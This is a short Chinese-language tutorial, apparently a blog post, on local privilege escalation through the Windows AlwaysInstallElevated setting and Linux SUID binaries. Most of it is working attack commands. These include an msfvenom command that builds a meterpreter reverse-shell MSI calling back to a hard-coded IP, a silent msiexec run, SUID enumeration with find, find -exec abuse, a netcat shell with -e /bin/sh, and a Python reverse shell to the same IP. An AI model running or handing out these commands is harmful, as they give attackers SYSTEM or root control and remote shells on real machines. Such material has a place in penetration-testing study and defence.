Windows本地提權/SUID提權
阿新 • • 發佈:2022-04-06
Windows-AlwayslnstallElevated提權
AlwaysInstallElevated是登錄檔的一個鍵值(windows 2003)
當其值為1的時候,普通使用者即可以system許可權安裝msi程式。
當前使用者許可權是否能夠更改MSI安裝時的啟用狀態,如不能修改則必須為啟用方可使用本次提權技術。
gpedit.msc
使用者配置>>管理模板>>Windows 元件>>Windows Installer>>始終以提升的許可權進行安裝 已啟用
.msi是系統安裝檔案
啟動狀態才可以成功
判斷是否存在window本地提權安全問題:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
生成利用的MSI檔案:
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5555 -f msi -o xiaodi.msi
執行MSI:
msiexec /quiet /qn /i xiaodi.msi
SUID提權
手工命令探針安全:
find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} ;
存在 Nmap/Vim/find/Bash/More/Less/Nano/cp之一,就有可能存在SUID提權
touch xiaodi
//會建立一個xiaodi的目錄,然後通過搜尋xiaodi並攜帶命令達到system的許可權執行命令
find xiaodi -exec whoami ;
利用NC反彈:
find xiaodi -exec netcat -lvp 5555 -e /bin/sh ;
netcat xx.xx.xx.xx 5555
利用Python反彈:
find xiaodi -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.94.236.117",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ; nc -lvp 7777